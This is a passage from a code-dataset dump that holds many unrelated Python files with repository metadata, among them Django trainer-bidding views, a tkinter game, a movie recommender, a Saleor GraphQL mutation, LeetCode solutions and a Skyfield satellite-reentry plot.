build_predict_input_fn = input_data.build_predict_input_fn(
opts, opts.predict_data_path)
checkpoint_path = opts.predict_checkpoint_path
if tf.gfile.IsDirectory(opts.predict_checkpoint_path):
checkpoint_path = tf.train.latest_checkpoint(checkpoint_path)
results = estimator.predict(
input_fn=build_predict_input_fn,
checkpoint_path=checkpoint_path,
yield_single_examples=True)
with open(opts.predict_output, 'w') as fout, \
open(opts.predict_data_path, 'r') as fin:
for result in results:
src = fin.readline().strip()
fout.write(src + ' ')
fout.write(str(result['score'][1]) + '\n')
tf.logging.info("Predict done")
|
[
"[email protected]"
] | |
b2e0391d750efe19f614deb8c2bd1631da82841d
|
5916383e8d3df886edd20ac00ce9706a78078f56
|
/飞机大战/v2/world.py
|
9e05cd9b131661fae9882e44e040079213137409
|
[] |
no_license
|
sczhan/wode
|
556154e8ccaa9192ea257bc88df3c5e4b268f88e
|
af4c721d0cedfdd2fe01dd681539724d1d64c378
|
refs/heads/master
| 2021-07-06T22:26:34.465708 | 2020-09-04T18:56:38 | 2020-09-04T18:56:38 | 181,295,279 | 1 | 0 | null | 2019-09-09T16:30:00 | 2019-04-14T10:53:57 |
Python
|
UTF-8
|
Python
| false | false | 1,656 |
py
|
import tkinter
"""
蜜蜂从上向下运动
可以通过键盘左右控制
"""
step = 0 # 计算器,计算一个走了多少步
direction = (1, 1)
x = 0
y = 10
def set_right(e):
"""
:param e:
:return:
"""
global x
x += 20
def set_left(e):
"""
:param e:
:return:
"""
global x
x -= 20
root_window = tkinter.Tk()
root_window.title("world")
root_window.bind("<Key-Left>", set_left)
root_window.bind("<Key-Right>", set_right)
# 设置不能更改宽,高
root_window.resizable(width=False, height=False)
window_canvas = tkinter.Canvas(root_window, width=450, height=600)
window_canvas.pack()
def main():
# 创建开始界面
bg_img_name = "../img/background.gif"
bg_img = tkinter.PhotoImage(file=bg_img_name)
# tags 的作用是,以后我们使用创建好的image可以通过tags使用
window_canvas.create_image(480/2, 600/2, anchor=tkinter.CENTER, image=bg_img, tags="bg")
# 画上一个小蜜蜂
bee = "../img/bee.gif"
bee_img = tkinter.PhotoImage(file=bee)
window_canvas.create_image(150, 180/2, anchor=tkinter.CENTER, image=bee_img, tags="bee")
sp = "../img/smallplane.gif"
sp_img = tkinter.PhotoImage(file=sp)
window_canvas.create_image(50, 100/2, anchor=tkinter.CENTER, image=sp_img, tags="sp")
# 让小飞机动起来
ap_move()
tkinter.mainloop()
def ap_move():
"""
:return:
"""
global step
global x
global y
y += 20
print(x, y)
window_canvas.move("sp", x, y)
window_canvas.move("bee", x, y)
step += 1
window_canvas.after(1000, ap_move)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
944dd21d731631667b2b61b7df4bbb9c9272ea4d
|
f0d6efe035d4c2ed1ea6bb6d1d5a613b8630a025
|
/lib/jsonrpc/flexjsonrpc/__init__.py
|
53ece394443611d381a3d2a3a98aed5682669d8f
|
[
"BSD-2-Clause-Views",
"BSD-3-Clause"
] |
permissive
|
bemoss/BEMOSS3.5
|
d24c1c5587e5081092cc97250db45645363da4e4
|
75a09bc5d0a2ec0ae994ac900a93dc027b527860
|
refs/heads/master
| 2021-08-15T23:05:40.661118 | 2021-03-29T20:28:14 | 2021-03-29T20:28:14 | 91,000,462 | 81 | 38 |
NOASSERTION
| 2021-03-29T20:29:54 | 2017-05-11T16:25:43 |
Python
|
UTF-8
|
Python
| false | false | 2,921 |
py
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2013, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
#}}}
from core import *
|
[
"[email protected]"
] | |
de387f75b9153d81353f74324c32842675a55b8c
|
888e79392cb660be5799cc5bd25d76bcfa9e2e2c
|
/doctorus/doctorus/doctype/actividad/test_actividad.py
|
64e868e23ae78de54542b56cedaaeb515a1bd9a4
|
[
"MIT"
] |
permissive
|
Nirchains/doctorus
|
269eadee5754612c521d1c6193d5fe7bbfdb3b8a
|
38d39270742dfdae6597a06713952df01a2c3e9d
|
refs/heads/master
| 2020-03-17T07:09:30.046005 | 2019-05-08T06:51:50 | 2019-05-08T06:51:50 | 133,386,354 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 216 |
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018, HISPALIS DIGITAL and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestActividad(unittest.TestCase):
pass
|
[
"[email protected]"
] | |
b2595d9eccaf22427e7e16962a002d011843363f
|
c2df9e04adec78e789d1fbdb0711c45e5b9263a7
|
/venv/Lib/site-packages/matplotlib/tests/test_texmanager.py
|
d24f7dc27a562a23298a3978078f1dbbcabf9e93
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
AdarshSai/Final_Project
|
433009a2f416e894ee3be85cd9317cb8e8df5516
|
f966834ca72dd232102ed500ef47ef2b3bdbed5b
|
refs/heads/main
| 2023-01-23T12:21:41.342074 | 2020-11-19T22:24:15 | 2020-11-19T22:24:15 | 308,898,012 | 0 | 1 |
MIT
| 2020-11-19T22:24:17 | 2020-10-31T14:19:58 |
Python
|
UTF-8
|
Python
| false | false | 475 |
py
|
import matplotlib.pyplot as plt
from matplotlib.texmanager import TexManager
def test_fontconfig_preamble():
"""
Test that the preamble is included in _fontconfig
"""
plt.rcParams['text.usetex'] = True
tm1 = TexManager()
font_config1 = tm1.get_font_config()
plt.rcParams['text.latex.preamble'] = '\\usepackage{txfonts}'
tm2 = TexManager()
font_config2 = tm2.get_font_config()
assert font_config1 != font_config2
|
[
"[email protected]"
] | |
3b600461905bbc4961263bfe2745dd295cc11579
|
d9296d3b420d8f5c1aeca094d00dd6bc38a3d57d
|
/read_statistics/migrations/0001_initial.py
|
ea8634dbdab68cbb44d0ce86241b1fce182ee74d
|
[] |
no_license
|
Anthony88888/mysite
|
57f5f40530886b12cf1364c10c6206983b022c6c
|
7130715ef3acac054b96fa22dcf19fec1f31e019
|
refs/heads/master
| 2023-01-09T12:15:11.720225 | 2020-10-25T14:48:35 | 2020-10-25T14:48:35 | 305,168,092 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 776 |
py
|
# Generated by Django 2.0.13 on 2020-10-06 16:27
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='ReadNum',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('read_num', models.IntegerField(default=0)),
('object_id', models.PositiveIntegerField()),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='contenttypes.ContentType')),
],
),
]
|
[
"[email protected]"
] | |
503a11282b2b012d89e3014060423162487ba9a6
|
fec863b67ec1ae65da7111bd8c77d0ab2ef1f6ce
|
/movie recommendation system/.history/model3_20210430162616.py
|
ef78677ec57da3e3bcb5a7edf1bc1dcf42a79f03
|
[] |
no_license
|
kannan768/movie-recommendation-system
|
e6cf71620e25a0185fed3b37896137f1f39b0801
|
7460d440d44e77390e459ab10c535b6971c9c3ab
|
refs/heads/main
| 2023-05-14T02:21:50.930672 | 2021-06-09T05:02:30 | 2021-06-09T05:02:30 | 375,225,316 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,918 |
py
|
#item-item filtering
#colloborative filtering
from math import sqrt
import pandas as pd
import numpy as np
import seaborn as sns
from matplotlib import pyplot as plt
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import linear_kernel
from sklearn.metrics import pairwise_distances
from scipy.spatial.distance import cosine, correlation
ratings = pd.read_csv('m1-1m/ratings.dat', sep='::', names=['userId', 'movieId', 'rating', 'timestamp'],engine = 'python', encoding = 'latin-1')
users = pd.read_csv('m1-1m/users.dat', sep='::', names=['userId', 'gender', 'age', 'occupation', 'zipcode'],engine = 'python', encoding = 'latin-1')
movies = pd.read_csv('m1-1m/movies.dat', sep='::', names=['movieId', 'title', 'genres'],engine = 'python', encoding = 'latin-1')
df_movies=movies
df_ratings=ratings
df_movies_ratings=pd.merge(df_movies, df_ratings)
ratings_matrix_items = df_movies_ratings.pivot_table(index=['movieId'],columns=['userId'],values='rating').reset_index(drop=True)
ratings_matrix_items.fillna( 0, inplace = True )
movie_similarity = 1 - pairwise_distances( ratings_matrix_items.to_numpy(), metric="cosine" )
np.fill_diagonal( movie_similarity, 0 )
ratings_matrix_items = pd.DataFrame( movie_similarity )
def item_similarity(movieName):
try:
user_inp=movieName
inp=df_movies[df_movies['title']==user_inp].index.tolist()
inp=inp[0]
df_movies['similarity'] = ratings_matrix_items.iloc[inp]
df_movies.columns = ['movie_id', 'title', 'release_date','similarity']
except:
print("Sorry, the movie is not in the database!")
def recommendedMoviesAsperItemSimilarity(user_id):
user_movie= df_movies_ratings[(df_movies_ratings.userId==user_id) & df_movies_ratings.rating.isin([5,4.5])][['title']]
user_movie=user_movie.iloc[0,0]
item_similarity(user_movie)
sorted_movies_as_per_userChoice=df_movies.sort_values( ["similarity"], ascending = False )
sorted_movies_as_per_userChoice=sorted_movies_as_per_userChoice[sorted_movies_as_per_userChoice['similarity'] >=0.45]['movie_id']
recommended_movies=list()
df_recommended_item=pd.DataFrame()
user2Movies= df_ratings[df_ratings['userId']== user_id]['movieId']
for movieId in sorted_movies_as_per_userChoice:
if movieId not in user2Movies:
df_new= df_ratings[(df_ratings.movieId==movieId)]
df_recommended_item=pd.concat([df_recommended_item,df_new])
best10=df_recommended_item.sort_values(['rating'], ascending = False )[1:10]
return best10['movieId']
def movieIdToTitle(listMovieIDs):
movie_titles= list()
for id in listMovieIDs:
movie_titles.append(df_movies[df_movies['movie_id']==id]['title'])
return movie_titles
user_id=50
print("Recommended movies,:\n",movieIdToTitle(recommendedMoviesAsperItemSimilarity(user_id)))
|
[
"[email protected]"
] | |
a48974d41c1667c0b092f366d4efcc8a8d480fcd
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_248/ch119_2020_03_30_20_53_23_088219.py
|
f49b4da0a032fcc39a7720976214d6d9206f89d1
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 165 |
py
|
lista[0]*n
lista[0]=1
t=0
while t<n:
lista[t+1]=lista[t]*x/n
t+=1
def calcula_euler(lista,n):
soma_das_notas = sum(lista)
print(soma_das_notas)
|
[
"[email protected]"
] | |
57b176a71b273a1c9636c541ba74fd7a62612b4b
|
ebd5c4632bb5f85c9e3311fd70f6f1bf92fae53f
|
/PORMain/panda/direct/extensions/NurbsCurveEvaluator-extensions.py
|
86eb757f5c5e803e4e77288108ddd26264177ebb
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
BrandonAlex/Pirates-Online-Retribution
|
7f881a64ec74e595aaf62e78a39375d2d51f4d2e
|
980b7448f798e255eecfb6bd2ebb67b299b27dd7
|
refs/heads/master
| 2020-04-02T14:22:28.626453 | 2018-10-24T15:33:17 | 2018-10-24T15:33:17 | 154,521,816 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 799 |
py
|
"""
NurbsCurveEvaluator-extensions module: contains methods to extend
functionality of the NurbsCurveEvaluator class
"""
def getKnots(self):
"""Returns the knot vector as a Python list of floats"""
knots = []
for i in xrange(self.getNumKnots()):
knots.append(self.getKnot(i))
return knots
def getVertices(self, relTo = None):
"""Returns the vertices as a Python list of Vec4's, relative
to the indicated space if given."""
verts = []
if relTo:
for i in xrange(self.getNumVertices()):
verts.append(self.getVertex(i, relTo))
else:
for i in xrange(self.getNumVertices()):
verts.append(self.getVertex(i))
return verts
|
[
"[email protected]"
] | |
e3968b5a6ee4acfc5472f3331048077d2290fe32
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_203/78.py
|
29bc91b6b0a4fa993c5a99a015c4bc7188f4154e
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,130 |
py
|
#!/usr/bin/env python2
import itertools
def solve_row(prev_row, row):
prev_row = list(prev_row)
prev_chars = set(prev_row)
#print prev_row, row
for i, row_i in enumerate(row):
if row_i == '?':
continue
min_i = i
max_i = i
while max_i + 1 < len(prev_row) and prev_row[max_i] == prev_row[max_i + 1]:
max_i += 1
while min_i - 1 >= 0 and prev_row[min_i] == prev_row[min_i - 1] and prev_row[min_i] in prev_chars:
min_i -= 1
prev_row[min_i:max_i+1] = row_i * (max_i + 1 - min_i)
return prev_row
def solve(r, c, a):
ans = []
prev_row = ['?' for _ in a[0]]
for row in a:
if any(row_i != '?' for row_i in row):
prev_row = solve_row(prev_row, row)
break
for row in a:
prev_row = solve_row(prev_row, row)
ans.append(prev_row)
assert '?' not in prev_row
return ans
def _iter_tuples(a):
for i, row in enumerate(a):
for j, row_j in enumerate(row):
yield i, j, row_j
def _to_tuples(a):
return list(_iter_tuples(a))
def check(r, c, a, ans):
a = _to_tuples(a)
ans = _to_tuples(ans)
for (i, j, char) in a:
if char != '?':
assert (i, j, char) in ans
ptslen = 0
for char in {char for (i, j, char) in a}:
if char == '?':
continue
pts = {(i, j) for (i, j, char2) in ans if char2 == char}
ptslen += len(pts)
i_min = min(i for i, j in pts)
i_max = max(i for i, j in pts)
j_min = min(j for i, j in pts)
j_max = max(j for i, j in pts)
pts2 = {(i, j) for i in xrange(i_min, 1 + i_max) for j in xrange(j_min, 1 + j_max)}
assert pts == pts2, (char, pts2 - pts)
assert ptslen == r * c
def main():
for t in xrange(1, 1 + int(raw_input())):
print 'Case #%d:' % t
r, c = map(int, raw_input().split())
a = [list(raw_input().strip()) for _ in xrange(r)]
ans = solve(r, c, a)
check(r, c, a, ans)
for row in ans:
print ''.join(row)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
fc17c5d9f4350ec9d4472375aea8d04b216e0ed2
|
4eee308593cb45abdfedecb3c80438584504cfed
|
/trainerbid/trainer/views.py
|
5b3fc9ef17ac3b580db1810124e186237d388ea7
|
[] |
no_license
|
sikha-jayanth/Trainer-Bidding
|
46ffb94f1af1a83f322e2b7cf1ff167e6c7150ee
|
fe43e6e9781d0da51a2805b7fbfb7b1dbb9b1af5
|
refs/heads/main
| 2023-01-21T01:13:38.866317 | 2020-11-30T22:16:30 | 2020-11-30T22:16:30 | 317,160,150 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,793 |
py
|
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.models import User
from django.shortcuts import render, redirect
from trainer.forms import RegistrationForm, PersonProfileForm, ApplicationForm, FilterApplicationForm
from django.contrib import messages
from institute.models import Requirements
from trainer.models import Application
from django.contrib.auth.decorators import login_required
from django.forms import forms
# Create your views here.
from trainer.models import PersonProfile
def trainerRegistration(request):
form = RegistrationForm()
context = {}
context["form"] = form
if request.method == 'POST':
form = RegistrationForm(request.POST)
if form.is_valid():
form.save()
return redirect("login")
else:
context["form"] = form
return render(request, "trainer/registration.html", context)
return render(request, "trainer/registration.html", context)
def trainerLogin(request):
if request.method == 'POST':
uname = request.POST.get('uname')
pwd = request.POST.get('pwd')
user = authenticate(request, username=uname, password=pwd)
if user is not None:
login(request, user)
return redirect("trainerhome")
else:
messages.info(request, 'invalid credentials!')
return render(request, "trainer/login.html")
return render(request, "trainer/login.html")
@login_required(login_url='login')
def trainerHome(request):
return render(request, 'trainer/trainerhome.html')
@login_required(login_url='login')
def trainerLogout(request):
logout(request)
return redirect("login")
@login_required(login_url='login')
def trainerProfile(request):
context = {}
user = User.objects.get(username=request.user)
fname = user.first_name
lname = user.last_name
fullname = fname + " " + lname
email = user.email
form = PersonProfileForm(initial={'user': request.user, 'name': fullname, 'email': email})
context["form"] = form
if request.method == 'POST':
form = PersonProfileForm(request.POST)
if form.is_valid():
form.save()
return redirect("viewprofile")
else:
context["form"] = form
return render(request, "trainer/createprofile.html", context)
return render(request, "trainer/createprofile.html", context)
@login_required(login_url='login')
def viewProfile(request):
profile = PersonProfile.objects.get(user=request.user)
context = {}
context["profile"] = profile
return render(request, "trainer/viewprofile.html", context)
@login_required(login_url='login')
def updateProfile(request):
profile = PersonProfile.objects.get(user=request.user)
form = PersonProfileForm(instance=profile)
context = {}
context["form"] = form
if request.method == 'POST':
form = PersonProfileForm(instance=profile, data=request.POST)
if form.is_valid():
form.save()
return redirect("viewprofile")
else:
context["form"] = form
return render(request, "trainer/updateprofile.html", context)
return render(request, "trainer/updateprofile.html", context)
@login_required(login_url='login')
def matchingJobs(request):
context = {}
profile = PersonProfile.objects.get(user=request.user)
skill = profile.skill
requirements = Requirements.objects.filter(skill_needed=skill)
context["requirements"] = requirements
return render(request, "trainer/listjobs.html", context)
@login_required(login_url='login')
def applyJob(request, pk):
context = {}
profile = PersonProfile.objects.get(user=request.user)
job = Requirements.objects.get(id=pk)
form = ApplicationForm(
initial={'jobid': job.jobid, 'job_title': job.job_title, 'location': job.location, 'user': request.user,
'name': profile.name,
'skill': profile.skill, 'years_of_experience': profile.years_of_experience,
'qualification': profile.qualification, 'cgpa': profile.cgpa, 'email': profile.email,
'phone': profile.phone})
context["form"] = form
if request.method == 'POST':
form = ApplicationForm(request.POST)
if form.is_valid():
form.save()
return render(request, "trainer/msgapplied.html")
else:
context["form"] = form
return render(request, "trainer/applyjob.html", context)
return render(request, "trainer/applyjob.html", context)
@login_required(login_url='login')
def viewApplications(request):
context = {}
form = FilterApplicationForm()
context["form"] = form
queryset = Application.objects.filter(user=request.user)
count = queryset.count()
context["count"] = count
context["applications"] = queryset
return render(request, "trainer/viewapplications.html", context)
@login_required(login_url='login')
def filterApplications(request):
context = {}
form = FilterApplicationForm()
context["form"] = form
if request.method == 'POST':
form = FilterApplicationForm(request.POST)
if form.is_valid():
status = form.cleaned_data['status']
queryset = Application.objects.filter(status=status, user=request.user)
count = queryset.count()
context["applications"] = queryset
context["count"] = count
return render(request, "trainer/viewapplications.html", context)
else:
context["form"] = form
return render(request, "trainer/viewapplications.html", context)
return render(request, "trainer/viewapplications.html", context)
|
[
"[email protected]"
] | |
2f147c1641f843f833516ed9c68321409fb72dac
|
84c4474a88a59da1e72d86b33b5326003f578271
|
/saleor/graphql/checkout/mutations/checkout_language_code_update.py
|
2da8f5d51c6bdb4c3a5fd72b4babc3f0f2d1e657
|
[
"BSD-3-Clause"
] |
permissive
|
vineetb/saleor
|
052bd416d067699db774f06453d942cb36c5a4b7
|
b0d5ec1a55f2ceeba6f62cf15f53faea0adf93f9
|
refs/heads/main
| 2023-07-20T02:01:28.338748 | 2023-07-17T06:05:36 | 2023-07-17T06:05:36 | 309,911,573 | 0 | 0 |
NOASSERTION
| 2020-11-04T06:32:55 | 2020-11-04T06:32:55 | null |
UTF-8
|
Python
| false | false | 2,360 |
py
|
import graphene
from saleor.webhook.event_types import WebhookEventAsyncType
from ...core import ResolveInfo
from ...core.descriptions import ADDED_IN_34, DEPRECATED_IN_3X_INPUT
from ...core.doc_category import DOC_CATEGORY_CHECKOUT
from ...core.enums import LanguageCodeEnum
from ...core.mutations import BaseMutation
from ...core.scalars import UUID
from ...core.types import CheckoutError
from ...core.utils import WebhookEventInfo
from ...plugins.dataloaders import get_plugin_manager_promise
from ..types import Checkout
from .utils import get_checkout
class CheckoutLanguageCodeUpdate(BaseMutation):
checkout = graphene.Field(Checkout, description="An updated checkout.")
class Arguments:
id = graphene.ID(
description="The checkout's ID." + ADDED_IN_34,
required=False,
)
token = UUID(
description=f"Checkout token.{DEPRECATED_IN_3X_INPUT} Use `id` instead.",
required=False,
)
checkout_id = graphene.ID(
required=False,
description=(
f"The ID of the checkout. {DEPRECATED_IN_3X_INPUT} Use `id` instead."
),
)
language_code = graphene.Argument(
LanguageCodeEnum, required=True, description="New language code."
)
class Meta:
description = "Update language code in the existing checkout."
doc_category = DOC_CATEGORY_CHECKOUT
error_type_class = CheckoutError
error_type_field = "checkout_errors"
webhook_events_info = [
WebhookEventInfo(
type=WebhookEventAsyncType.CHECKOUT_UPDATED,
description="A checkout was updated.",
)
]
@classmethod
def perform_mutation( # type: ignore[override]
cls,
_root,
info: ResolveInfo,
/,
*,
checkout_id=None,
id=None,
language_code,
token=None
):
checkout = get_checkout(cls, info, checkout_id=checkout_id, token=token, id=id)
checkout.language_code = language_code
checkout.save(update_fields=["language_code", "last_change"])
manager = get_plugin_manager_promise(info.context).get()
cls.call_event(manager.checkout_updated, checkout)
return CheckoutLanguageCodeUpdate(checkout=checkout)
|
[
"[email protected]"
] | |
426c5e0d5a83f6df17a3d005e7214aa7f8ce9038
|
189d79c0e0fcdce192a6034306416fd492202501
|
/LeetCode/Python/306 Additive Number.py
|
c7806ee6c106e36c199ee794f0ded80b76622235
|
[] |
no_license
|
digant0705/Algorithm
|
294fbc84eaa4b6e0ea864924b71c4773c2e1c0c6
|
01f04bcc5e8f55014973d4eef069245f3f663eb9
|
refs/heads/master
| 2021-07-25T16:44:34.366974 | 2021-06-05T23:37:17 | 2021-06-05T23:37:17 | 251,144,249 | 0 | 0 | null | 2020-03-29T22:05:29 | 2020-03-29T22:05:28 | null |
UTF-8
|
Python
| false | false | 1,981 |
py
|
# -*- coding: utf-8 -*-
'''
Additive Number
===============
Additive number is a string whose digits can form additive sequence.
A valid additive sequence should contain at least three numbers. Except for the
first two numbers, each subsequent number in the sequence must be the sum of
the preceding two.
For example:
"112358" is an additive number because the digits can form an additive
sequence: 1, 1, 2, 3, 5, 8.
1 + 1 = 2, 1 + 2 = 3, 2 + 3 = 5, 3 + 5 = 8
"199100199" is also an additive number, the additive sequence is:
1, 99, 100, 199.
1 + 99 = 100, 99 + 100 = 199
Note: Numbers in the additive sequence cannot have leading zeros, so sequence
1, 2, 03 or 1, 02, 3 is invalid.
Given a string containing only digits '0'-'9', write a function to determine
if it's an additive number.
Follow up:
How would you handle overflow for very large input integers?
'''
import collections
class Solution(object):
'''算法思路:
前两个数字固定,那么就可以判断整个序列,所以枚举前两个不同的数字即可
'''
def add(self, a, b):
i, j, carry, r = len(a) - 1, len(b) - 1, 0, collections.deque()
while i >= 0 or j >= 0:
carry, mod = divmod(
(int(a[i]) if i >= 0 else 0) +
(int(b[j]) if j >= 0 else 0) + carry, 10)
r.appendleft(mod)
i -= 1
j -= 1
if carry:
r.appendleft(carry)
return ''.join(map(str, r))
def check(self, a, b, num):
if not num:
return True
sum = self.add(a, b)
if num.startswith(sum):
return self.check(b, sum, num[len(sum):])
return False
def isAdditiveNumber(self, num):
return any(
self.check(num[:i + 1], num[i + 1:j + 1], num[j + 1:])
for i in xrange(len(num) - 2)
for j in xrange(i + 1, len(num) - 1)
)
s = Solution()
print s.isAdditiveNumber("11")
|
[
"[email protected]"
] | |
d06c40ecaf072a5bad0a3bfcdf2cff9f0960317d
|
ccb4cb8358fb896a88bbf0c6771462d898d7a492
|
/examples/goce_reentry_chart.py
|
decf8f0416fb3a95317f8d7eb65579f41c578074
|
[
"MIT"
] |
permissive
|
skyfielders/python-skyfield
|
a30d34a680dcd285bc8cd39cedc2629f792d5821
|
61fb6324e312715e20aa75ec24dc87286442be1a
|
refs/heads/master
| 2023-08-31T13:10:32.863587 | 2023-08-10T14:25:56 | 2023-08-10T14:25:56 | 7,924,113 | 1,040 | 204 |
MIT
| 2023-08-28T19:44:50 | 2013-01-30T21:19:21 |
Python
|
UTF-8
|
Python
| false | false | 2,026 |
py
|
import numpy as np
from matplotlib import pyplot as plt
from matplotlib.dates import HourLocator, DateFormatter
from skyfield.api import load, EarthSatellite
# Labels for both date and hour on the x axis, and km on y.
def label_dates_and_hours(axes):
axes.xaxis.set_major_locator(HourLocator([0]))
axes.xaxis.set_minor_locator(HourLocator([0, 6, 12, 18]))
axes.xaxis.set_major_formatter(DateFormatter('0h\n%Y %b %d\n%A'))
axes.xaxis.set_minor_formatter(DateFormatter('%Hh'))
for label in ax.xaxis.get_ticklabels(which='both'):
label.set_horizontalalignment('left')
axes.yaxis.set_major_formatter('{x:.0f} km')
axes.tick_params(which='both', length=0)
# Load the satellite's final TLE entry.
sat = EarthSatellite(
'1 34602U 09013A 13314.96046236 .14220718 20669-5 50412-4 0 930',
'2 34602 096.5717 344.5256 0009826 296.2811 064.0942 16.58673376272979',
'GOCE',
)
# Build the time range `t` over which to plot, plus other values.
ts = load.timescale()
t = ts.tt_jd(np.arange(sat.epoch.tt - 2.0, sat.epoch.tt + 2.0, 0.005))
reentry = ts.utc(2013, 11, 11, 0, 16)
earth_radius_km = 6371.0
# Compute geocentric positions for the satellite.
g = sat.at(t)
valid = [m is None for m in g.message]
# Start a new figure.
fig, ax = plt.subplots()
# Draw the blue curve.
x = t.utc_datetime()
y = np.where(valid, g.distance().km - earth_radius_km, np.nan)
ax.plot(x, y)
# Label the TLE epoch.
x = sat.epoch.utc_datetime()
y = sat.at(sat.epoch).distance().km - earth_radius_km
ax.plot(x, y, 'k.')
ax.text(x, y - 9, 'Epoch of TLE data ', ha='right')
# Label the official moment of reentry.
x = reentry.utc_datetime()
y = sat.at(reentry).distance().km - earth_radius_km
ax.plot(x, y, 'r.')
ax.text(x, y + 6, ' Moment of re-entry', c='r')
# Grid lines and labels.
ax.grid(which='both')
ax.set(title='GOCE satellite: altitude above sea level', xlabel='UTC')
label_dates_and_hours(ax)
# Render the plot to a PNG file.
fig.savefig('goce-reentry.png', bbox_inches='tight')
|
[
"[email protected]"
] | |
be938368f2fbe8f503a6259a20e3e9714ac29b5c
|
5af4b89949a703bcc53bdc25a19a5ff079817cce
|
/papermerge/core/models/folder.py
|
00f6881892ed5ee47048c385c945b3f38b07f4ff
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
0xpointer42/papermerge
|
4b176a865ffa3044605844406fecd3ac5f3c5657
|
9bea16e96d460d00229e813f7063e45bfd07b4e2
|
refs/heads/master
| 2022-09-09T09:18:56.596921 | 2020-06-02T15:45:11 | 2020-06-02T15:45:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 658 |
py
|
from django.utils.translation import ugettext_lazy as _
from papermerge.core import mixins
from papermerge.core.models.kvstore import KVNode
from papermerge.core.models.node import BaseTreeNode
from papermerge.search import index
class Folder(mixins.ExtractIds, BaseTreeNode):
search_fields = [
index.SearchField('title'),
index.SearchField('text', partial_match=True, boost=2),
index.SearchField('notes')
]
@property
def kv(self):
return KVNode(instance=self)
class Meta:
verbose_name = _("Folder")
verbose_name_plural = _("Folders")
def __str__(self):
return self.title
|
[
"[email protected]"
] | |
29d64bfeff13d2d620664beeb544713fc033e990
|
614d5ec96dcd9c6bb7a4384ea5420a7757c43d34
|
/examples/checkable.py
|
3bb79a1ddb3669a679ec3b68eab1e3c9bd9625ce
|
[
"MIT"
] |
permissive
|
githeshuai/dayu_widgets_tag
|
52ae4816addd58505b6bbd0e4cd12f931df89e95
|
